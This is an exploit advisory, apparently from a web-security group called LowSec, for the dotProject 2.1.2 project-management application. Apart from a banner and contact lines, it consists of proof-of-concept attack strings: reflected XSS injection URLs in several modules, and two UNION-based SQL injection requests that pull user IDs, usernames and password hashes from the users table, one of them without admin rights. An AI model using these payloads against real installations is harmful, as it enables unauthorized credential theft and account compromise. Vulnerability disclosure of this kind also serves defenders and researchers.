#=======================================================================# .____ _________ ._. | | ______ _ __/ _____/ ____ ____| | | | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ | | |__( <_> ) / / \ ___/\ \___\| |_______ \____/ \/\_/ /_______ /\___ >\___ >_ \/ \/ \/ \/\/ (http://wwwlowsec.org) #========================================================================# Author: C1c4Tr1Z Date: 28/08/08 Application: dotProject 2.1.2 (29/06/2008) Product WebSite: http://www.dotproject.net/ (*) With some of this exploits you need an ADMIN/ANONYMOUS account (*) I think that this proyect might be vulnerable to Cross-Site Request Forgery #========================================================================# #=============================[XSS]======================================# POC: /index.php?m=tasks&inactive=toggle"> /index.php?m=calendar&a=day_view&date=20080828"> /index.php?m=public&a=calendar&dialog=1&callback=setCalendar"> /index.php?m=ticketsmith&type=My'> #========================================================================# #=============================[SQL]======================================# POC as "ADMIN": /index.php?m=admin&a=viewuser&user_id=1 AND 1=0 UNION SELECT 1,2,concat_ws(0x3a,user_id,user_username,user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47 FROM users POC as "ANONYMOUS" or other: /index.php?m=projects&tab=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user_id,user_username,user_password),14,15,16,17,18,19,20,21,22 FROM users-- #========================================================================# #========================================================================# Contact: C1c4Tr1Z (http://wwwlowsec.org) LowSec! Web Application Security (Lab). Deus ex Machina #========================================================================#